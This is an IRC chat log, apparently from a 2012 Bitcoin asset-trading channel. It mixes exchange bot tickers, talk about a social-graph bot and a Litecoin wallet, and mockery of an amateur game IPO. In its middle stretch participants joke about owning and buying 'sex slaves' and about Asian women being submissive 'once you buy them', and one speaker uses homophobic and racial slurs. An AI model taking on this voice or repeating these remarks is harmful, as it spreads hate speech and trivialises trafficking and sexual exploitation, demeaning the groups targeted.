offered on a handshake." Aug 25 15:05:42 YES! Aug 25 15:05:43 yu have live graph, enjoy! Aug 25 15:05:50 we need to bring back the handshake and the gentlemen! Aug 25 15:05:54 o hi MrTiggr Aug 25 15:06:00 MrTiggr, is there a command to get the url Aug 25 15:06:06 http://www.worldzeitgeist.org:443/images/socnet/bitcoin-assets/bitcoin-assets-current.png Aug 25 15:06:31 i see me:) Aug 25 15:06:37 i see myself at the edge too lol Aug 25 15:06:43 fsck goat is everywhere Aug 25 15:06:47 what data does it use ? what it gets while on chan ? Aug 25 15:06:50 :P Aug 25 15:07:04 its my job to be everywhere:) Aug 25 15:07:08 why ? Aug 25 15:07:12 it monitors all posts to the chan and uses a vaiety of metrics to derive the social graph Aug 25 15:07:20 hilites are part of it Aug 25 15:07:21 very cool. Aug 25 15:07:26 but rapid-chat alternatitions Aug 25 15:07:33 liek this ? Aug 25 15:07:35 and adjacency and stuff make up other metrics Aug 25 15:07:39 yerp Aug 25 15:07:39 [GLBSE] [MMM] 5 @ 0.8 = 4 BTC [+] Aug 25 15:07:52 you'ra a good man, bless you. Aug 25 15:08:22 ive been away for many days, im going to assume that that would affect my dots and lines? Aug 25 15:08:43 Chaang-Noi it seems it has very old data with a smattering of the past few minutes. Aug 25 15:08:47 will sort out in time Aug 25 15:09:12 of i just hit refresh and it will change? Aug 25 15:09:31 oh crazy Aug 25 15:09:33 hmm, MrTiggr some ppl appear twice ? like two kakobrekla two Chaang-Noi etc Aug 25 15:09:58 my names has more than 2 or 3 a's Aug 25 15:10:06 chaang and chaaang and chaaaang its all me Aug 25 15:10:10 sometimes wifi just sucks lol Aug 25 15:10:13 o i see nm my bad Aug 25 15:10:22 :D Aug 25 15:10:29 hm Aug 25 15:10:29 i can clear the db for this chan if you like Aug 25 15:10:39 i think it is mixing like ...year old data with now Aug 25 15:10:52 also maybe.... merge nicks by ident/host ? Aug 25 15:10:54 ahh now i got errors Aug 25 15:11:08 you prolly should wipe old ya Aug 25 15:11:08 yeh ... gimme a sec, i clear it Aug 25 15:11:12 [MPEX] [F.GIGA.ETF] 13400 @ 0.00102135 = 13.6861 BTC [+] Aug 25 15:11:14 ok Aug 25 15:12:48 test Aug 25 15:14:05 ok - well, looks like changes will take place next reboot of the bot; the graph is just a little funky for now; sorry guys Aug 25 15:15:38 np thanks Aug 25 15:16:43 [GLBSE] [GIGAMINING] 8 @ 0.982 = 7.856 BTC [+] Aug 25 15:18:38 Lol, so this is rg and usagi's channel. Aug 25 15:19:11 teek teek teek teek teek teek Aug 25 15:19:12 teek teek teek teek teek teek Aug 25 15:19:13 teek teek teek teek teek teek Aug 25 15:20:03 ahh he's closer now. Aug 25 15:20:23 lol Aug 25 15:20:28 You could use this data to socialize Aug 25 15:20:29 get a room you two Aug 25 15:20:46 Hey BTCHero! Long time no see. What's up man Aug 25 15:21:01 BTCHero: Haven't chatted with you in a while. What are you working on these days? Aug 25 15:21:12 i actually thought of a good IRC game to play with the graphs usagi , kakobrekla Aug 25 15:21:32 omg wtf who told windows ppl to put cancel on lefT! Aug 25 15:21:40 start a new channel - invite the bot .... whoever is in the middle at the end of a timer wins a prize Aug 25 15:22:00 MrTiggr you mind adding it to #trilema ? Aug 25 15:22:08 sure Aug 25 15:22:10 :D Aug 25 15:25:23 MrTiggr :) Aug 25 15:26:02 ofc the prize wud be bitcoins :D Aug 25 15:34:09 !ticker S.DICE Aug 25 15:34:11 [MPEX:S.DICE] 1day: 0.0032 / 0.00320205 / 0.003232 (1609462 shares, 5,153.58 BTC), 30day: 0.0032 / 0.00320205 / 0.003232 (1609462 shares, 5,153.58 BTC) Aug 25 15:34:17 !ticker GIGAMINING Aug 25 15:34:20 [GLBSE:GIGAMINING] [Bid: 0.9651] [Ask: 0.9845] [Spread: 0.0194] [Last: 0.982] [24hVol: 76.55499] [7dAvg: 0.99266985] Aug 25 15:34:35 !ticker TYGRR.BOND-P Aug 25 15:34:38 [GLBSE:TYGRR.BOND-P] [Bid: 0.6001337] [Ask: 0.6699] [Spread: 0.0697663] [Last: 0.6001337] [24hVol: 201.28088084] [7dAvg: 0.68518132] Aug 25 15:36:56 .6 seems fair Aug 25 15:40:53 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Aug 25 15:41:27 [MPEX] [S.MPOE] 8493 @ 0.00037505 = 3.1853 BTC [-] Aug 25 15:41:29 [MPEX] [S.MPOE] 6825 @ 0.00037735 = 2.5754 BTC [+] Aug 25 15:41:30 [MPEX] [S.MPOE] 23488 @ 0.00037953 = 8.9144 BTC [+] Aug 25 15:41:37 anyone here got some litecoins they can help me with? Aug 25 15:42:34 How many? Aug 25 15:42:52 i think rg has a bunch Aug 25 15:43:00 [MPEX] [S.MPOE] 45700 @ 0.000375 = 17.1375 BTC [-] Aug 25 15:43:18 usagi: How many would you need? Aug 25 15:43:25 sending you a pm Aug 25 15:43:31 Ok Aug 25 15:49:13 [GLBSE] [ASICMINER] 11 @ 0.08989998 = 0.9889 BTC [-] Aug 25 15:49:45 i have a decent amount Aug 25 15:49:48 not as much as i usually have Aug 25 15:49:49 but some Aug 25 15:50:02 well rg I just added a litecoin wallet to hotwallet Aug 25 15:50:12 Gonna code the exchange next :> Aug 25 15:50:26 i will never let anyone touch my litecoin wallet again Aug 25 15:50:27 I'm testing litecoin send and recieve now. Aug 25 15:50:34 not after greedi have me the joan collins special Aug 25 15:50:39 right up the pooper Aug 25 15:50:54 What happened Aug 25 15:51:14 'software error' cause it to send it all to someone else Aug 25 15:53:16 Lol now THATS bullshit Aug 25 15:53:31 How the hell did that happen I wonder Aug 25 15:55:13 cause he's as good of a coder as he is honorable Aug 25 15:55:25 normally.. if my error cause someone to lost $500 Aug 25 15:55:28 id reimburse them Aug 25 15:55:31 most people would, yea? Aug 25 15:55:36 Well I am a better coder and I'm going to insure hotwallet funds. Aug 25 15:55:38 but no Aug 25 15:55:39 instead Aug 25 15:55:42 he gets ops in #litecoin Aug 25 15:55:49 and people are just plain leaving now Aug 25 15:55:50 cause hes a nazi Aug 25 15:56:00 greedi made litecoin? Aug 25 15:56:01 he's worse than gmaxwell with the -otc rules Aug 25 15:56:02 no Aug 25 15:56:04 fuck no Aug 25 15:58:15 Is there a block explorer type service for litecoins? Aug 25 15:58:39 yep Aug 25 15:58:58 http://explorer.litecoin.net/ Aug 25 15:59:14 [MPEX] [F.GIGA.ETF] 65 @ 0.00100438 = 0.0653 BTC [-] Aug 25 15:59:14 [MPEX] [F.GIGA.ETF] 7498 @ 0.0009981 = 7.4838 BTC [-] Aug 25 16:00:20 [MPEX] [O.BTCUSD.P130T] 2 @ 0.32060999 = 0.6412 BTC [-] Aug 25 16:06:03 [MPEX] [S.MPOE] 26561 @ 0.00037953 = 10.0807 BTC [+] Aug 25 16:06:05 [MPEX] [S.MPOE] 14400 @ 0.00038186 = 5.4988 BTC [+] Aug 25 16:06:06 [MPEX] [S.MPOE] 20439 @ 0.00038302 = 7.8285 BTC [+] Aug 25 16:06:08 [GLBSE] [COGNITIVE] 1 @ 0.6995 BTC [+] Aug 25 16:07:48 [GLBSE] [FUTUREFUND] 300 @ 0.0001195 = 0.0359 BTC [+] Aug 25 16:10:17 i have over 100k ltc why do you need them? Aug 25 16:10:43 Chaang-Noi: hookers and blow Aug 25 16:11:55 hmm Aug 25 16:11:58 bitches and whores Aug 25 16:12:03 i have over 200k i guess Aug 25 16:12:11 i just kept buying lol Aug 25 16:12:38 [GLBSE] [BIF.5-10.MININGBOND] 30 @ 0.5 = 15 BTC [+] Aug 25 16:13:17 [MPEX] [F.GIGA.ETF] 6700 @ 0.00099773 = 6.6848 BTC [-] Aug 25 16:16:24 wonder what sorta whores take ltc Aug 25 16:17:29 lol Aug 25 16:20:22 i could only assume lady boys or maybe mircea_popescu's sex slaves Aug 25 16:22:01 [GLBSE] [OBSI.HRPT] 25 @ 0.106 = 2.65 BTC [+] Aug 25 16:22:09 Chaang-Noi wha ? Aug 25 16:22:11 [GLBSE] [ASICMINER] 5 @ 0.08989998 = 0.4495 BTC [-] Aug 25 16:22:31 did you not say you kept sex slaves a few days ago? Aug 25 16:22:38 http://wtvr.com/2012/08/23/brandon-raub-judge-orders-release-of-detained-marine-veteran-freed/ this is pretty outlandish Aug 25 16:22:40 yes Chaang-Noi Aug 25 16:22:51 do you rent them out for ltc? Aug 25 16:23:19 lol nope. Aug 25 16:23:30 i was trying to find whores that would take ltc Aug 25 16:23:39 there might not be any Aug 25 16:23:45 well... azns are lighter so. Aug 25 16:23:47 mebbe there :D Aug 25 16:23:49 <_locust_> litewhores...? Aug 25 16:23:55 liteRALLYwhores Aug 25 16:24:22 i bet some asians would.. but how to get ltc miners out of the basementto asia... Aug 25 16:25:25 What the F*** Aug 25 16:25:29 0.1 fees for litecoin sends? Aug 25 16:25:33 Is that normal? Aug 25 16:25:42 ive never paid a fee Aug 25 16:25:51 are you doig this from btc-e ? Aug 25 16:25:56 No Aug 25 16:26:03 ive never paid a fee for ltc sending Aug 25 16:26:08 Hotwallet https://199.48.69.241/hotwallet Aug 25 16:26:10 but anyway .1 ltc is nothing Aug 25 16:26:23 I just tested litecoin send and recieve -- it works. BINGO!@ F(*(^%$ BINGO ! hahaha Aug 25 16:26:34 iv never used that Aug 25 16:26:56 iv never even heard of hotwallet Aug 25 16:27:05 [MPEX] [F.GIGA.ETF] 317 @ 0.00099773 = 0.3163 BTC [-] Aug 25 16:27:25 he's developing it Aug 25 16:28:38 oh Aug 25 16:28:49 ahh i see his copy right Aug 25 16:30:19 [GLBSE] [JAH] 1 @ 0.16 BTC [-] Aug 25 16:30:58 [MPEX] [S.DICE] 1500 @ 0.0032 = 4.8 BTC [-] Aug 25 16:31:19 mmm i hope DeaDTerra gets back in time Aug 25 16:32:21 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 25 16:33:09 so these sex slaves, are they willing and into bdsm or did you have to steal them? Aug 25 16:33:37 i didn't steal anybody lol Aug 25 16:34:09 most women acrtually prefer to live submissively if ithey can find somebody competent to d' them Aug 25 16:34:39 how many do you have? Aug 25 16:34:45 a few. Aug 25 16:34:57 seems like a lot of work Aug 25 16:35:07 well... it can be, but usually isn't. Aug 25 16:35:13 linux seems like a lot of work originally too. Aug 25 16:35:30 usagi Aug 25 16:35:33 you need a damn hostname Aug 25 16:35:35 lol Aug 25 16:35:49 too bad you cant have hotwall.et Aug 25 16:35:52 .et is a real tld Aug 25 16:35:59 you.re.et Aug 25 16:36:01 but they dont do .et, only .com.et etc Aug 25 16:36:04 okay i will ahve to talk to my wife about it but i bet she would let me get one or two... Aug 25 16:36:15 Chaang-Noi why would you want them anyway ? Aug 25 16:36:29 im bored Aug 25 16:36:36 [GLBSE] [OBSI.HRPT] 9 @ 0.107 = 0.963 BTC [+] Aug 25 16:36:38 [GLBSE] [GOLD] 1 @ 0.00989 BTC [-] Aug 25 16:36:40 haha bad reason. get a goldfish Aug 25 16:36:45 i assume you can let them go in the wild when you are done right? Aug 25 16:36:56 no dood. it's people we're discussing here. Aug 25 16:37:37 well if they cant go free then there must be some sort of market then for used sex slaves? Aug 25 16:38:32 [MPEX] [S.MPOE] 36220 @ 0.00037517 = 13.5887 BTC [-] Aug 25 16:38:34 [MPEX] [S.MPOE] 4180 @ 0.00037948 = 1.5862 BTC [+] Aug 25 16:38:52 i doubt ebay would work Aug 25 16:39:04 no, you are stuck with them for the rest of your life!!!1 Aug 25 16:41:25 what if i die? Aug 25 16:42:12 i dont think i want that much pressure... i forget to water my plants.... Aug 25 16:42:42 yeah. which is why most girls can't find masters. Aug 25 16:43:04 lock up one more time you goddamned fucking faggot Aug 25 16:43:32 Okay Aug 25 16:43:40 [MPEX] [S.MPOE] 1000 @ 0.00037516 = 0.3752 BTC [-] Aug 25 16:43:49 All I want is an approved IPO I paid $80 for Aug 25 16:43:50 asian girls are pretty submissive anyway Aug 25 16:44:04 Chaang-Noi: that is not true Aug 25 16:44:06 esp once you buy them :/ Aug 25 16:44:11 they used to be in the old country Aug 25 16:44:18 ;;seen nefario Aug 25 16:44:19 nefario was last seen in #bitcoin-assets 26 minutes and 49 seconds ago: lol Aug 25 16:44:21 whatever passes for an old country in east asia, anyways Aug 25 16:44:31 s/an/the/ Aug 25 16:44:44 Nefario: Have you looked at VersaCoin yet? Aug 25 16:44:46 but the new crop? all fucking westernized Aug 25 16:44:56 BUY ME SHIT OR ME LOVE YOU NO MORE Aug 25 16:44:58 fuck that womn Aug 25 16:45:24 either recognize he glory that is my penis or go fuck yoursef Aug 25 16:45:34 and why the fuck is my keyboard dropping etters again Aug 25 16:45:34 in thailand the rates start around 50,000 baht or like 1.5k usd Aug 25 16:45:45 lllllll wrok you goddamned nigger Aug 25 16:46:14 I have the only fucking keyboard in the fucking world that I have to fucking hotplug to make it work Aug 25 16:46:20 the firmware fucking crashes I fuck you not Aug 25 16:46:33 EmanuelDeOrtego: no why would I? Aug 25 16:46:40 whats special about it? Aug 25 16:47:01 nefario: It's a listing I paid for... Aug 25 16:47:14 EmanuelDeOrtego: doesnt fucking matter Aug 25 16:47:20 nefario likes to sit on that shit for 3 days Aug 25 16:47:22 becxause he can Aug 25 16:47:31 OH ITS ALL LIKE BECAUSE OF SECURITIES AND SHIT Aug 25 16:47:39 Well, it's been 3 days, I believe. Aug 25 16:47:41 I could be wrong. Aug 25 16:47:51 Diablo-D3 never bought a kbd with firmware, never will. Aug 25 16:47:53 fuck firmware. Aug 25 16:48:03 mircea_popescu: dude, I didnt even know keyboards HAD firmwares Aug 25 16:48:05 But what domain name should I get RG? Aug 25 16:48:10 see, I asked my gamer friends Aug 25 16:48:11 I am not asking for investors. Aug 25 16:48:12 It needs to be a good sounding name Aug 25 16:48:13 HEY GAMER FRIENDS Aug 25 16:48:14 the newer shit with programmable displays etc do. Aug 25 16:48:16 WHATS A GOOD KEYBOARD Aug 25 16:48:18 they say razor Aug 25 16:48:23 I just want to get what I paid for, heh. Aug 25 16:48:24 well, I knew razor was a shit brand Aug 25 16:48:26 I knew this up front Aug 25 16:48:28 but I said Aug 25 16:48:30 hey why not Aug 25 16:48:36 you got got. Aug 25 16:48:37 there was one for sale for $10 usually $60 Aug 25 16:48:42 Can I get a .name address with namecoins, rg? Aug 25 16:48:42 prolly trolling you. Aug 25 16:48:45 now I have exactly two problems Aug 25 16:48:53 1) I have a razor keyboard Aug 25 16:48:56 2) IT WONT FUCKING DIE Aug 25 16:49:04 IT KNOWS I HATE IT AND IT WONT DIE Aug 25 16:49:10 its the most uncomfortable fucking pile of shit Aug 25 16:49:40 gamer keyboard my fucking fat pussy seaking torpedo. Aug 25 16:49:58 my love icbm. Aug 25 16:50:00 so buy a genius ione for $4 Aug 25 16:50:03 ir w.e Aug 25 16:50:08 mircea_popescu: no Aug 25 16:50:14 I am going to get a fucking ibm model m Aug 25 16:50:19 or a das keyboard blank Aug 25 16:50:24 or the sdpace cadet :D Aug 25 16:50:34 no space cadets for me Aug 25 16:50:36 I use vim not emacs Aug 25 16:50:40 dohohohhoho Aug 25 16:50:59 nefario: To be even more specific, it's a security I paid for 3 or so days ago. Just looking for updates. Aug 25 16:51:09 [GLBSE] [ASICMINER] 110 @ 0.08989998 = 9.889 BTC [-] Aug 25 16:51:14 lol Aug 25 16:51:26 EmanuelDeOrtego: see, thats where you went wrong Aug 25 16:51:28 [GLBSE] [DMC] 1 @ 0.06 BTC [-] Aug 25 16:51:29 nice to see 25+ year old jokes are still live and well. Aug 25 16:51:37 >0.06 Aug 25 16:51:40 hey, we're up Aug 25 16:51:55 [GLBSE] [ASICMINER] 1 @ 0.08989998 BTC [-] Aug 25 16:51:56 Diablo-D3: I didn't pay him even more money? Aug 25 16:52:08 EmanuelDeOrtego: no, you didnt take a pair of pliers to his fingers Aug 25 16:52:14 nefario needs to up the cost of ipos. Aug 25 16:52:19 8 btc is a joke. Aug 25 16:52:52 I would agree if things were quicker. Aug 25 16:55:57 [GLBSE] [STANDARD.GOLD] 1000 @ 0.0001 = 0.1 BTC [+] Aug 25 17:03:02 damn, where did btc-mining go Aug 25 17:03:21 [GLBSE] [ASICMINER] 42 @ 0.08989998 = 3.7758 BTC [-] Aug 25 17:03:23 [GLBSE] [ASICMINER] 43 @ 0.08989999 = 3.8657 BTC [+] Aug 25 17:03:24 [GLBSE] [ASICMINER] 291 @ 0.0899 = 26.1609 BTC [+] Aug 25 17:03:55 to sleep Aug 25 17:04:27 Somebody keeps buying STANDARD.GOLD at full price. Aug 25 17:04:47 Nobody reads contracts. : ( Aug 25 17:04:53 whats the contract? Aug 25 17:05:08 After April 2012, if Bitcoin is traded at a USD price equal or greater to the NYMEX* USD price of one (1) troy ounce of Gold on Mt.Gox* before the first time Bitcoin is traded on Mt. Gox at a price of at most $1 USD, this bond will be bought back for .0001 Bitcoins. Aug 25 17:05:08 Otherwise this bond is assumed worthless. Aug 25 17:05:25 People are buying it at .0001 Aug 25 17:05:27 Bitcoins Aug 25 17:05:43 Now their money gets to be mine for the next year or so. : P Aug 25 17:06:08 silly asset Aug 25 17:06:27 EmanuelDeOrtego: so .... if the price ever drops to $1, you buy back the shares but until then it... does nothing? Aug 25 17:06:33 It's supposed to measure the likelihood of events Aug 25 17:06:43 Diablo-D3: It's hitting the price of Gold. Aug 25 17:06:46 Just you wait Aug 25 17:07:47 silly asset << ++ Aug 25 17:08:21 All I know is that it will eventually be profitable. Aug 25 17:08:24 That isn't silly Aug 25 17:08:57 if i used an exchange i'd seriously pay people to nuke such assets. Aug 25 17:09:34 https://glbse.com/asset/view/IMPACT Aug 25 17:09:41 This, my friends, is silly Aug 25 17:11:33 too lazyto read it. what is it ? Aug 25 17:11:44 a buch of nonsense Aug 25 17:12:16 You guys enjoy your mining bonds. Aug 25 17:12:21 That's all I have to say. Aug 25 17:12:32 http://www.videobash.com/video_show/clever-bird-goes-fishing-364959 check out the fishing bird Aug 25 17:12:36 is NYAN.C turning in to a turd? Aug 25 17:12:42 [MPEX] [S.MPOE] 43751 @ 0.00037948 = 16.6026 BTC [+] Aug 25 17:12:49 EskimoBob: no Aug 25 17:12:55 nyan.c covers all the risky shit Aug 25 17:13:01 its .a that should be turning into a turd Aug 25 17:13:26 !pl Aug 25 17:13:26 !pl [@] [] Aug 25 17:13:30 [GLBSE] [PAJKA.BOND] 5 @ 0.089 = 0.445 BTC [-] Aug 25 17:13:33 If you guys want to see shit, you should the American-OTC penny stocks Aug 25 17:13:41 !pl NYAN.A 1 Aug 25 17:13:42 Requesting data from GLBSE (might take a while). Aug 25 17:13:43 NYAN.A [1@1BTC] paid: 0.03 BTC. Last price: 1 BTC. Capital gain: 0 BTC. Total: 0.03 BTC. (3%) Aug 25 17:13:50 !pl NYAN.C 1 Aug 25 17:13:50 Requesting data from GLBSE (might take a while). Aug 25 17:13:59 NYAN.C [1@1BTC] paid: 0.08618649 BTC. Last price: 0.85 BTC. Capital gain: -0.15 BTC. Total: -0.06381351 BTC. (-6.4%) Aug 25 17:14:27 [GLBSE] [TEEK.B] 3 @ 0.8003 = 2.4009 BTC [-] Aug 25 17:14:42 why should .a turn into a turd ? Aug 25 17:15:00 [GLBSE] [TEEK.B] 2 @ 0.8002 = 1.6004 BTC [-] Aug 25 17:15:06 nefario: nice job with exchange. Thank you Aug 25 17:15:41 !pl dmc 1 Aug 25 17:15:41 Requesting data from GLBSE (might take a while). Aug 25 17:15:43 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.06 BTC. Capital gain: -0.94 BTC. Total: -0.91364186 BTC. (-91.4%) Aug 25 17:15:53 wow what a useless script Aug 25 17:16:04 lol. why useless ? it's great. Aug 25 17:16:18 mircea_popescu: turd is EskimoBob's word for "fixed mhash mining bond" Aug 25 17:16:45 I think my STANDARD.GOLD would classify as a turd in the eyes of some Aug 25 17:16:48 well seeing how it's not invested on s.dice/s,mpoe and pirate went away Aug 25 17:16:53 what the heck else would it be ? Aug 25 17:17:27 mircea_popescu: well, theres a lot of asicminer in there Aug 25 17:17:29 and a lot of dmc Aug 25 17:17:37 which arern't miner bonds ? Aug 25 17:18:15 which arent _fixed_ miner bonds Aug 25 17:18:26 !pl JAH 1 Aug 25 17:18:26 Requesting data from GLBSE (might take a while). Aug 25 17:18:28 JAH [1@1BTC] paid: 0.07809846 BTC. Last price: 0.16 BTC. Capital gain: -0.84 BTC. Total: -0.76190154 BTC. (-76.2%) Aug 25 17:18:39 jah was not at 1 afaik Aug 25 17:18:56 I didn't know what the 1 parameter meant Aug 25 17:18:56 0.285? Aug 25 17:19:01 !pl Aug 25 17:19:02 !pl [@] [] Aug 25 17:19:09 !pl JAH 0.19 Aug 25 17:19:09 Requesting data from GLBSE (might take a while). Aug 25 17:19:13 JAH [1@0.19BTC] paid: 0.07809846 BTC. Last price: 0.16 BTC. Capital gain: -0.03 BTC. Total: 0.04809846 BTC. (25.3%) Aug 25 17:19:44 and if you put no date? Aug 25 17:19:53 no date = all data Aug 25 17:20:02 all payments Aug 25 17:20:18 !pl JAH 0.19 2012-08-01 Aug 25 17:20:19 Requesting data from GLBSE (might take a while). Aug 25 17:20:22 JAH [1@0.19BTC] (since: 2012-08-01) paid: 0.01253961 BTC. Last price: 0.16 BTC. Capital gain: -0.03 BTC. Total: -0.01746039 BTC. (-9.2%) Aug 25 17:20:37 cool Aug 25 17:20:37 [GLBSE] [GOLD] 6 @ 0.00989 = 0.0593 BTC [-] Aug 25 17:20:57 !pl OBSI.HRPT 0.1 2012-08-01 Aug 25 17:20:57 Requesting data from GLBSE (might take a while). Aug 25 17:21:01 OBSI.HRPT [1@0.1BTC] (since: 2012-08-01) paid: 0.0223 BTC. Last price: 0.107 BTC. Capital gain: 0.007 BTC. Total: 0.0293 BTC. (29.3%) Aug 25 17:22:04 [GLBSE] [FUTUREFUND] 50 @ 0.0001195 = 0.006 BTC [+] Aug 25 17:24:35 [MPEX] [S.DICE] 3125 @ 0.0032 = 10 BTC [-] Aug 25 17:27:15 [MPEX] [O.BTCUSD.P110T] 18 @ 0.07922948 = 1.4261 BTC [-] Aug 25 17:27:39 [MPEX] [O.BTCUSD.P120T] 3 @ 0.15989856 = 0.4797 BTC [-] Aug 25 17:28:02 [MPEX] [O.BTCUSD.P170T] 1 @ 0.64443962 BTC [-] Aug 25 17:28:22 [MPEX] [O.BTCUSD.C040T] 1 @ 0.61536715 BTC [-] Aug 25 17:28:31 [MPEX] [O.BTCUSD.C030T] 1 @ 0.71227537 BTC [-] Aug 25 17:28:39 [MPEX] [O.BTCUSD.C070T] 1 @ 0.33276456 BTC [-] Aug 25 17:28:49 [MPEX] [O.BTCUSD.C020T] 1 @ 0.82868136 BTC [-] Aug 25 17:28:50 [MPEX] [O.BTCUSD.C020T] 1 @ 0.80918358 BTC [-] Aug 25 17:28:52 [GLBSE] [FPGAMINING] 15 @ 0.92899 = 13.9349 BTC [+] Aug 25 17:28:53 [GLBSE] [FPGAMINING] 30 @ 0.929 = 27.87 BTC [+] Aug 25 17:29:03 [MPEX] [O.BTCUSD.P130T] 2 @ 0.25680677 = 0.5136 BTC [-] Aug 25 17:30:58 https://bitcointalk.org/index.php?topic=102922.0 Aug 25 17:31:02 Oh gawd Aug 25 17:32:31 THE IPO: Aug 25 17:32:31 Battalion: Genesis, a 3D video game set in 2252 AD needs you! Well, investors, that is. This Initial Public Offering is a serious attempt aimed at raising funds to support this real world project, with an estimated 12-18 months of development remaining. Aug 25 17:32:36 what's riskier than a video game ? Aug 25 17:32:48 greek debt. Aug 25 17:32:49 Price? 10,000 shares are going up for grabs initially, so for a 1% stake in net profit you would be looking to own 500 shares. The IPO (on GLBSE) will offer shares at the following rates: Aug 25 17:32:49 3000 @ 0.95 btc per share Aug 25 17:32:49 4000 @ 1.00 btc per share Aug 25 17:32:49 3000 @ 1.05 btc per share Aug 25 17:33:00 hotwallet junk bonds Aug 25 17:33:03 i like that they copied the trached system used for bvps/dice tho Aug 25 17:33:09 nyan. Aug 25 17:33:26 srsly, in spite of all the bitching and sillyness people are willing to learn it seems. Aug 25 17:33:57 1) Space is "in" but may soon be "out" - There are several games set in space that have been released recently, as well as a few on the horizon, and most aren't selling well. How will this effect BTNG? Aug 25 17:33:57 The lack of space games has indeed driven the production of several games recently. However, all games so far have tried to recapture old ground Aug 25 17:34:07 so basically, everyone else failed but we'll make it cause we're cool Aug 25 17:34:09 so said mommy. Aug 25 17:34:15 we don't have a distribution deal tho. Aug 25 17:34:34 You need to see the video of their "awesome graphics." Aug 25 17:34:36 2) You don't have a large team working on the game, what if it never finishes? Aug 25 17:34:36 This is an understandable concern, considering I'm essentially doing this on my own at the moment. Aug 25 17:34:42 It's like I went back to the 90s Aug 25 17:34:45 at the moment. Aug 25 17:34:54 i like "at the moment". it's like a whore, this expression. Aug 25 17:35:08 http://www.youtube.com/watch?feature=player_embedded&v=V-cF92JuRZM Aug 25 17:35:15 um Aug 25 17:35:20 she and her sister "right now" have the complete collection of VD (verbal diseases) Aug 25 17:37:55 Previous to this I set up and ran a simmer sauce manufacturing business (www.ameetshomestyle.com) on a dime, so I do have experience in organizing complex problems into more manageable chunks to create a cohesive, commercial grade whole, all on a deadline. Aug 25 17:38:16 i'm in awe of the internets. Aug 25 17:39:39 [GLBSE] [MERGEDMINING] 100 @ 0.093 = 9.3 BTC [+] Aug 25 17:40:01 You know, I feel insulted. Aug 25 17:40:09 6) What if you make a really shitty game that doesn't sell any copies? Aug 25 17:40:09 This is a true risk that you face as an investor, and something that all game investors face. I've had a hardcore, mostly mainstream taste in games for 20 years, and believe I'm self aware enough to know when I'm enjoying something because it's fun, or I'm playing something because I've been skinner boxed. Aug 25 17:40:25 these people. they mean so well and do so much damage by it :( Aug 25 17:41:53 I think Nefario is intentionally putting off my IPO. Aug 25 17:44:17 Another security was approved in the same time frame as mine. Aug 25 17:44:29 I think that's very unprofessional. Aug 25 17:44:44 Especially without any notice. Aug 25 17:44:58 It's nothing intentional EmanuelDeOrtego Aug 25 17:45:11 Well, I take back what I said. Aug 25 17:46:10 you can see I've been busy the last couple of days Aug 25 17:46:18 the last 3 days I've not had any sleep Aug 25 17:46:23 ouch. Aug 25 17:46:26 that's not good. Aug 25 17:46:27 Pardon me, my friend. Aug 25 17:46:44 I will wait patiently then. Aug 25 17:46:49 Take your time. Aug 25 17:47:49 I just fear the unknown. Aug 25 17:47:53 We all do usually. Aug 25 17:47:59 [GLBSE] [OBSI.ABMO] 2 @ 0.08 = 0.16 BTC [-] Aug 25 17:51:10 Anyways, GLBSE is going to get a lot better soon. Aug 25 17:51:21 That's all I will say. Aug 25 17:59:53 [GLBSE] [ASICMINER] 95 @ 0.0899 = 8.5405 BTC [+] Aug 25 18:00:57 [MPEX] [O.BTCUSD.P080N] 7 @ 0.09780307 = 0.6846 BTC [-] Aug 25 18:04:59 Wheee I found a security hole Aug 25 18:05:01 im a goat! Aug 25 18:05:03 in my system Aug 25 18:05:50 im not in your system! Aug 25 18:05:52 DeaDTerra: why are you not taking advantage of the arbitrage available to you with s.dice? Aug 25 18:06:13 DeaDTerra: is it difficult to issue more shares on GLBSE? Aug 25 18:09:14 hctib we're kinda waiting for him to come backl online. Aug 25 18:09:22 he cant get shit to work Aug 25 18:09:24 and he is too busy Aug 25 18:09:37 and people keep using his name to sell shit and its not him lol Aug 25 18:11:44 [GLBSE] [NYAN.B] 1 @ 0.999 BTC [+] Aug 25 18:12:26 lol ya srsly. Aug 25 18:13:21 [MPEX] [S.MPOE] 48523 @ 0.0003781 = 18.3465 BTC [-] Aug 25 18:13:23 [MPEX] [S.MPOE] 4626 @ 0.00037663 = 1.7423 BTC [-] Aug 25 18:15:38 [MPEX] [S.MPOE] 7669 @ 0.00037948 = 2.9102 BTC [+] Aug 25 18:19:33 [MPEX] [S.MPOE] 35300 @ 0.00038269 = 13.509 BTC [+] Aug 25 18:19:34 [MPEX] [S.MPOE] 13300 @ 0.00038302 = 5.0942 BTC [+] Aug 25 18:21:37 Okay, anybody want to help me create a Bitcoin stock exchange that specializes in high-risk, unverified stocks? Aug 25 18:21:56 To list a security, it costs only 1 BTC. Aug 25 18:22:42 You can list whatever you want that's not CP or Murder. Aug 25 18:22:56 why not ? Aug 25 18:26:02 [MPEX] [S.DICE] 5000 @ 0.0032 = 16 BTC [-] Aug 25 18:27:31 < BTC-Mining> but MPOE/S.DICE have passthrough on GLBSE <<< mpoe.etf is more of a managed fund than a passthru Aug 25 18:28:15 Who here is account 47? Aug 25 18:28:27 On hotwallet? If that's you please msg me! Aug 25 18:29:37 [GLBSE] [FPGAMINING] 25 @ 0.93 = 23.25 BTC [+] Aug 25 18:29:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6001337 BTC [-] Aug 25 18:29:49 [GLBSE] [TYGRR.BOND-P] 3 @ 0.56 = 1.68 BTC [-] Aug 25 18:29:50 [GLBSE] [TYGRR.BOND-P] 5 @ 0.55 = 2.75 BTC [-] Aug 25 18:31:53 [GLBSE] [TYGRR.BOND-P] 5 @ 0.55 = 2.75 BTC [-] Aug 25 18:33:30 [GLBSE] [FPGAMINING] 19 @ 0.93 = 17.67 BTC [+] Aug 25 18:33:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.54 BTC [-] Aug 25 18:33:43 [GLBSE] [TYGRR.BOND-P] 1 @ 0.53 BTC [-] Aug 25 18:33:44 [GLBSE] [TYGRR.BOND-P] 1 @ 0.52 BTC [-] Aug 25 18:33:44 [GLBSE] [TYGRR.BOND-P] 20 @ 0.52 = 10.4 BTC [-] Aug 25 18:33:46 [GLBSE] [TYGRR.BOND-P] 22 @ 0.52 = 11.44 BTC [-] Aug 25 18:33:47 [GLBSE] [TYGRR.BOND-P] 2 @ 0.511 = 1.022 BTC [-] Aug 25 18:33:49 [GLBSE] [TYGRR.BOND-P] 45 @ 0.511 = 22.995 BTC 